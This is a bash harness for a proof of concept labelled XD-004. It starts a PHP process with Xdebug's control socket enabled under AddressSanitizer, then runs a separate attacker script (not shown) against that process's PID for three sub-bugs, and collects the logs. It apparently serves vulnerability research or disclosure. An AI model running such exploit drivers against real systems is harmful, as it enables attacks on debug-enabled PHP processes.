#!/usr/bin/env bash
# XD-004 PoC orchestrator. Runs all three sub-bugs against a fresh victim.
#
# Edit these paths or pass via env:

PHP=${PHP:-/home/ilia/php-src-8.4/sapi/cli/php}
XDEBUG_SO=${XDEBUG_SO:-/home/ilia/xdebug/modules/xdebug.so}
ATTACKER_PHP=${ATTACKER_PHP:-php}
MODE=${1:-all}

set -u
HERE=$(dirname "$0")

if [ ! -x "$PHP" ];          then echo "PHP=$PHP not executable"; exit 2; fi
if [ ! -f "$XDEBUG_SO" ];    then echo "XDEBUG_SO=$XDEBUG_SO not found"; exit 2; fi
if ! command -v "$ATTACKER_PHP" >/dev/null; then
    echo "ATTACKER_PHP=$ATTACKER_PHP not found in PATH"; exit 2
fi

run_case() {
    local CASE="$1"
    local VICTIM_OUT
    local LOG
    VICTIM_OUT=$(mktemp)
    LOG=$(mktemp)
    trap 'rm -f "$VICTIM_OUT" "$LOG"' RETURN

    echo "=== XD-004$CASE ==="
    ASAN_OPTIONS=detect_leaks=0:abort_on_error=0:halt_on_error=0:print_stacktrace=1 \
    "$PHP" \
        -d zend_extension="$XDEBUG_SO" \
        -d xdebug.mode=develop \
        -d xdebug.control_socket=default \
        -d xdebug.log="$LOG" \
        -d xdebug.log_level=10 \
        "$HERE/victim.php" \
        >"$VICTIM_OUT" 2>&1 &
    local VICTIM_BG=$!

    sleep 1
    local PID
    PID=$(grep -oE 'pid=[0-9]+' "$VICTIM_OUT" | head -1 | cut -d= -f2)
    if [ -z "$PID" ]; then
        echo "victim never printed its PID"
        kill "$VICTIM_BG" 2>/dev/null || true
        return 3
    fi
    echo "victim pid=$PID (uid=$(id -u))"

    "$ATTACKER_PHP" "$HERE/attacker.php" "$PID" "$CASE"

    wait "$VICTIM_BG" 2>/dev/null
    echo "--- xdebug.log relevant lines ---"
    grep -E "CTRL-AUTH|CTRL-HANDLE" "$LOG" 2>/dev/null || echo "  (none)"
    echo "--- victim stderr tail ---"
    tail -10 "$VICTIM_OUT"
    echo
}

case "$MODE" in
    a|b|c) run_case "$MODE" ;;
    all)   run_case a; run_case b; run_case c ;;
    *)     echo "usage: $0 [a|b|c|all]"; exit 1 ;;
esac